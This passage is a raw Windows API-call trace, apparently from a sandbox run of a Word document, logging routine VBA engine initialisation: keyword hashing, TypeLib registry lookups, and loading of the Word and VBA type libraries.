[0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#ElseIf") returned 0x10e5b5 [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#End") returned 0x10d478 [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="#If") returned 0x10d383 [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Attribute") returned 0x10ed01 [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Base") returned 0x109fb8 [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Control") returned 0x10a946 [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Creatable") returned 0x101d92 [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Customizable") returned 0x10c26d [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Description") returned 0x1009d0 [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Exposed") returned 0x1030b3 [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Ext_KEY") returned 0x10a88e [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_HelpID") returned 0x103e41 [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_Func") returned 0x10c92c [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_Property") returned 0x107f4a [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_PropertyPut") returned 0x106658 [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Invoke_PropertyPutRef") returned 0x105b25 [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_MemberFlags") returned 0x108db7 [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_Name") returned 0x10e2ff [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_PredeclaredId") returned 0x105fc7 [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_ProcData") returned 0x107005 [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_TemplateDerived") returned 0x109f1e [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarDescription") returned 0x103303 [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarHelpID") returned 0x10a3b6 [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarMemberFlags") returned 0x10b6ea [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarProcData") returned 0x101b0c [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_UserMemId") returned 0x107b95 [0029.875] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_VarUserMemId") returned 0x104d5f [0029.876] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VB_GlobalNameSpace") returned 0x10ce77 [0029.876] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName=",") returned 0x101043 [0029.876] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName=".") returned 0x101045 [0029.876] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="\"") returned 0x101039 [0029.876] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_") returned 0x101076 [0029.876] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLngPtr") returned 0x105ab0 [0029.876] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLngPtr") returned 0x1036f2 [0029.876] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PtrSafe") returned 0x106f4a [0029.876] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="CLngLng") returned 0x104463 [0029.876] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DefLngLng") returned 0x1020a5 [0029.876] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LongLong") returned 0x10378e [0029.876] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="LongPtr") returned 0x10d4e8 [0029.876] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0029.876] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="0") returned 0x101047 [0029.876] RegOpenKeyA (in: hKey=0xffffffff80000000, lpSubKey="TypeLib", phkResult=0x2e61d0 | out: phkResult=0x2e61d0*=0x9fe) returned 0x0 [0029.876] RegOpenKeyW (in: hKey=0x9fe, lpSubKey="{00020905-0000-0000-C000-000000000046}", phkResult=0x2e61c8 | out: phkResult=0x2e61c8*=0xa16) returned 0x0 [0029.877] RegEnumKeyW (in: hKey=0xa16, dwIndex=0x0, lpName=0x2e61f8, cchName=0xa | out: lpName="8.7") returned 0x0 [0029.877] wcscpy_s (in: _Destination=0x2e61e0, _SizeInWords=0xa, _Source="8.7" | out: _Destination="8.7") returned 0x0 [0029.877] RegOpenKeyW (in: hKey=0xa16, lpSubKey="8.7", phkResult=0x2e6288 | out: phkResult=0x2e6288*=0xa26) returned 0x0 [0029.878] _ultoa_s (in: _Val=0x409, _DstBuf=0x2e6200, _Size=0xa, _Radix=16 | out: _DstBuf="409") returned 0x0 [0029.878] RegOpenKeyA (in: hKey=0xa26, lpSubKey="409", phkResult=0x2e61f0 | out: phkResult=0x2e61f0*=0x0) returned 0x2 [0029.879] RegOpenKeyW (in: hKey=0xa2e, lpSubKey="win64", phkResult=0x2e61f8 | out: phkResult=0x2e61f8*=0xa36) returned 0x0 [0029.880] RegCloseKey (hKey=0xa36) returned 0x0 [0029.880] RegCloseKey (hKey=0xa2e) returned 0x0 [0029.880] _ultow_s (in: _Value=0x0, _Buffer=0x2e6290, _BufferCount=0x9, _Radix=16 | out: _Buffer="0") returned 0x0 [0029.881] RegOpenKeyW (in: hKey=0xa26, lpSubKey="0", phkResult=0x2e6268 | out: phkResult=0x2e6268*=0xa2a) returned 0x0 [0029.881] RegQueryValueW (in: hKey=0xa2a, lpSubKey="win64", lpData=0x2e62b0, lpcbData=0x2e6264 | out: lpData="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", lpcbData=0x2e6264) returned 0x0 [0029.881] wcscpy_s (in: _Destination=0x2e65e0, _SizeInWords=0x104, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0029.881] RegCloseKey (hKey=0xa2a) returned 0x0 [0029.882] RegCloseKey (hKey=0xa26) returned 0x0 [0029.882] RegCloseKey (hKey=0xa16) returned 0x0 [0029.882] RegCloseKey (hKey=0x9fe) returned 0x0 [0029.882] LoadTypeLib (in: szFile="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB", pptlib=0x2e6268*=0x0 | out: pptlib=0x2e6268*=0x731da90) returned 0x0 [0029.882] ITypeLib:RemoteGetDocumentation (in: This=0x731da90, index=-1, refPtrFlags=0x2e6288, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x91dc7b8 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x91dc7b8) returned 0x0 [0029.882] IUnknown:QueryInterface (in: This=0x731da90, riid=0x7fee3a76290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e6078 | out: ppvObject=0x2e6078*=0x0) returned 0x80004002 [0029.882] ITypeLib:RemoteGetLibAttr (in: This=0x731da90, ppTLibAttr=0x2e6070, pDummy=0x10 | out: ppTLibAttr=0x2e6070, pDummy=0x10) returned 0x0 [0029.882] ITypeLib:RemoteGetDocumentation (in: This=0x731da90, index=-1, refPtrFlags=0x0, pBstrName=0x2e6068, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x774b5e0 | out: pBstrName=0x2e6068*="Microsoft Word 16.0 Object Library", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x774b5e0*="߾") returned 0x0 [0029.882] StringFromGUID2 (in: rguid=0x766cf90*(Data1=0x20905, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x2e6090, cchMax=39 | out: lpsz="{00020905-0000-0000-C000-000000000046}") returned 39 [0029.882] _ultow_s (in: _Value=0x8, _Buffer=0x2e5fda, _BufferCount=0x10, _Radix=16 | out: _Buffer="8") returned 0x0 [0029.883] _ultow_s (in: _Value=0x7, _Buffer=0x2e5fde, _BufferCount=0xe, _Radix=16 | out: _Buffer="7") returned 0x0 [0029.883] _ultow_s (in: _Value=0x0, _Buffer=0x2e5fe2, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0029.883] wcscpy_s (in: _Destination=0x73638f8, _SizeInWords=0x8e, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0029.883] wcscpy_s (in: _Destination=0x73638fe, _SizeInWords=0x8b, _Source="{00020905-0000-0000-C000-000000000046}" | out: _Destination="{00020905-0000-0000-C000-000000000046}") returned 0x0 [0029.883] wcscpy_s (in: _Destination=0x736394a, _SizeInWords=0x65, _Source="#8.7#0#" | out: _Destination="#8.7#0#") returned 0x0 [0029.883] wcscpy_s (in: _Destination=0x7363958, _SizeInWords=0x5e, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0029.883] wcscpy_s (in: _Destination=0x73639ce, _SizeInWords=0x23, _Source="Microsoft Word 16.0 Object Library" | out: _Destination="Microsoft Word 16.0 Object Library") returned 0x0 [0029.883] ITypeLib:LocalReleaseTLibAttr (This=0x731da90) returned 0x0 [0029.883] wcscpy_s (in: _Destination=0x754c420, _SizeInWords=0x8e, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library" | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0029.883] ITypeLib:RemoteGetDocumentation (in: This=0x731da90, index=-1, refPtrFlags=0x2e6188, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x4 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x4) returned 0x0 [0029.883] SysStringLen (param_1="Word") returned 0x4 [0029.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0029.883] SysStringLen (param_1="Word") returned 0x4 [0029.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x2e671f8, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0029.883] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Word") returned 0x106bb5 [0029.883] strcpy_s (in: _Dst=0x2e5f80, _DstSize=0x5, _Src="Word" | out: _Dst="Word") returned 0x0 [0029.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e5f80, cbMultiByte=5, lpWideCharStr=0x2e5dd0, cchWideChar=5 | out: lpWideCharStr="Word") returned 5 [0029.883] wcsncpy_s (in: _Destination=0x2e5d80, _SizeInWords=0x108, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0029.883] CharLowerBuffW (in: lpsz="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchLength=0x8d | out: lpsz="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library") returned 0x8d [0029.883] IMalloc:Alloc (This=0x7fefe015380, cb=0x11c) returned 0x779f980 [0029.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", cchWideChar=142, lpMultiByteStr=0x779f980, cbMultiByte=284, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", lpUsedDefaultChar=0x0) returned 142 [0029.883] IMalloc:Free (This=0x7fefe015380, pv=0x779f980) [0029.883] wcscpy_s (in: _Destination=0x77ebfe0, _SizeInWords=0x8e, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library" | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0029.883] wcsncpy_s (in: _Destination=0x2e5dc0, _SizeInWords=0x108, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0029.883] CharLowerBuffW (in: lpsz="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchLength=0x8d | out: lpsz="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library") returned 0x8d [0029.883] IMalloc:Alloc (This=0x7fefe015380, cb=0x11c) returned 0x779f980 [0029.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", cchWideChar=142, lpMultiByteStr=0x779f980, cbMultiByte=284, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", lpUsedDefaultChar=0x0) returned 142 [0029.883] IMalloc:Free (This=0x7fefe015380, pv=0x779f980) [0029.883] wcsncpy_s (in: _Destination=0x2e5d80, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0x0 [0029.883] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", cchLength=0x27 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc") returned 0x27 [0029.883] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", cchWideChar=40, lpMultiByteStr=0x2e5cb0, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", lpUsedDefaultChar=0x0) returned 40 [0029.884] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0 [0029.884] IUnknown:AddRef (This=0x731da90) returned 0x3 [0029.884] IUnknown:QueryInterface (in: This=0x731da90, riid=0x7fee3a764b8*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e61a8 | out: ppvObject=0x2e61a8*=0x0) returned 0x80004002 [0029.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x2e6170, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0029.884] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Word") returned 0x106bb5 [0029.884] IUnknown:Release (This=0x731da90) returned 0x2 [0029.884] GetModuleFileNameW (in: hModule=0x7fee36e0000, lpFilename=0x7fee3aaa9f0, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll")) returned 0x42 [0029.884] QueryPathOfRegTypeLib (in: guid=0x7fee3a826a0*(Data1=0x204ef, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), wMaj=0x4, wMin=0x0, lcid=0x409, lpbstrPathName=0x2e6210 | out: lpbstrPathName=0x2e6210) returned 0x0 [0029.887] LoadTypeLibEx (in: szFile="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL", regkind=0x2, pptlib=0x2e6268*=0x0 | out: pptlib=0x2e6268*=0x782a220) returned 0x0 [0029.894] IUnknown:AddRef (This=0x782a220) returned 0x2 [0029.895] ITypeLib:RemoteGetDocumentation (in: This=0x782a220, index=-1, refPtrFlags=0x2e6288, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x489d00 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x489d00*="鴀H") returned 0x0 [0029.895] IUnknown:QueryInterface (in: This=0x782a220, riid=0x7fee3a76290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x2e6078 | out: ppvObject=0x2e6078*=0x0) returned 0x80004002 [0029.895] ITypeLib:RemoteGetLibAttr (in: This=0x782a220, ppTLibAttr=0x2e6070, pDummy=0x10 | out: ppTLibAttr=0x2e6070, pDummy=0x10) returned 0x0 [0029.895] ITypeLib:RemoteGetDocumentation (in: This=0x782a220, index=-1, refPtrFlags=0x0, pBstrName=0x2e6068, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x176026035964 | out: pBstrName=0x2e6068*="Visual Basic For Applications", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x176026035964) returned 0x0 [0029.895] StringFromGUID2 (in: rguid=0x766cf90*(Data1=0x204ef, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x2e6090, cchMax=39 | out: lpsz="{000204EF-0000-0000-C000-000000000046}") returned 39 [0029.895] _ultow_s (in: _Value=0x4, _Buffer=0x2e5fda, _BufferCount=0x10, _Radix=16 | out: _Buffer="4") returned 0x0 [0029.895] _ultow_s (in: _Value=0x2, _Buffer=0x2e5fde, _BufferCount=0xe, _Radix=16 | out: _Buffer="2") returned 0x0 [0029.895] _ultow_s (in: _Value=0x9, _Buffer=0x2e5fe2, _BufferCount=0xc, _Radix=16 | out: _Buffer="9") returned 0x0 [0029.895] wcscpy_s (in: _Destination=0x73638f8, _SizeInWords=0x91, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0029.895] wcscpy_s (in: _Destination=0x73638fe, _SizeInWords=0x8e, _Source="{000204EF-0000-0000-C000-000000000046}" | out: _Destination="{000204EF-0000-0000-C000-000000000046}") returned 0x0 [0029.895] wcscpy_s (in: _Destination=0x736394a, _SizeInWords=0x68, _Source="#4.2#9#" | out: _Destination="#4.2#9#") returned 0x0 [0029.895] wcscpy_s (in: _Destination=0x7363958, _SizeInWords=0x61, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0029.895] wcscpy_s (in: _Destination=0x73639de, _SizeInWords=0x1e, _Source="Visual Basic For Applications" | out: _Destination="Visual Basic For Applications") returned 0x0 [0029.895] ITypeLib:LocalReleaseTLibAttr (This=0x782a220) returned 0x0 [0029.895] wcscpy_s (in: _Destination=0x7778918, _SizeInWords=0x91, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications" | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0029.895] ITypeLib:RemoteGetDocumentation (in: This=0x782a220, index=-1, refPtrFlags=0x2e6188, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3) returned 0x0 [0029.895] SysStringLen (param_1="VBA") returned 0x3 [0029.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0029.895] SysStringLen (param_1="VBA") returned 0x3 [0029.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x72660d8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0029.895] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA") returned 0x10e2f7 [0029.895] strcpy_s (in: _Dst=0x2e5f80, _DstSize=0x4, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0029.895] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e5f80, cbMultiByte=4, lpWideCharStr=0x2e5dd0, cchWideChar=4 | out: lpWideCharStr="VBA") returned 4 [0029.895] IUnknown:AddRef (This=0x731da90) returned 0x3 [0029.895] ITypeLib:RemoteIsName (in: This=0x731da90, szNameBuf="VBA", lHashVal=0x10e2f7, pfName=0x2e5ea0, pBstrLibName=0x2e5dd0 | out: pfName=0x2e5ea0*=0, pBstrLibName=0x2e5dd0) returned 0x0 [0029.895] IUnknown:Release (This=0x731da90) returned 0x2 [0029.895] IMalloc:Alloc (This=0x7fefe015380, cb=0xc) returned 0x774bbe0 [0029.895] IMalloc:Free (This=0x7fefe015380, pv=0x766d110) [0029.895] IMalloc:Alloc (This=0x7fefe015380, cb=0x20) returned 0x766d110 [0029.895] IMalloc:Free (This=0x7fefe015380, pv=0x774bbe0) [0029.895] wcsncpy_s (in: _Destination=0x2e5d80, _SizeInWords=0x108, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _MaxCount=0x106 | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0029.895] CharLowerBuffW (in: lpsz="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchLength=0x90 | out: lpsz="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications") returned 0x90 [0029.895] IMalloc:Alloc (This=0x7fefe015380, cb=0x122) returned 0x779f980 [0029.895] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", cchWideChar=145, lpMultiByteStr=0x779f980, cbMultiByte=290, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", lpUsedDefaultChar=0x0) returned 145 [0029.895] IMalloc:Free (This=0x7fefe015380, pv=0x779f980) [0029.896] wcscpy_s (in: _Destination=0x54a0d00, _SizeInWords=0x91, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications" | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0029.896] wcsncpy_s (in: _Destination=0x2e5dc0, _SizeInWords=0x108, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _MaxCount=0x106 | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0029.896] CharLowerBuffW (in: lpsz="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchLength=0x90 | out: lpsz="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications") returned 0x90 [0029.896] IMalloc:Alloc (This=0x7fefe015380, cb=0x122) returned 0x779f980 [0029.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", cchWideChar=145, lpMultiByteStr=0x779f980, cbMultiByte=290, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", lpUsedDefaultChar=0x0) returned 145 [0029.896] IMalloc:Free (This=0x7fefe015380, pv=0x779f980) [0029.896] wcsncpy_s (in: _Destination=0x2e5d80, _SizeInWords=0x108, _Source="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _MaxCount=0x106 | out: _Destination="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0x0 [0029.896] CharLowerBuffW (in: lpsz="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", cchLength=0x27 | out: lpsz="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc") returned 0x27 [0029.896] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", cchWideChar=40, lpMultiByteStr=0x2e5cb0, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cc:\\users\\aetadzjz\\desktop\\098073.doc", lpUsedDefaultChar=0x0) returned 40 [0029.896] _wcsicmp (_String1="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc", _String2="*\\CC:\\Users\\aETAdzjz\\Desktop\\098073.doc") returned 0 [0029.896] IUnknown:AddRef (This=0x782a220) returned 0x3 [0029.896] IUnknown:QueryInterface (in: This=0x782a220, riid=0x7fee3a764b8*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, 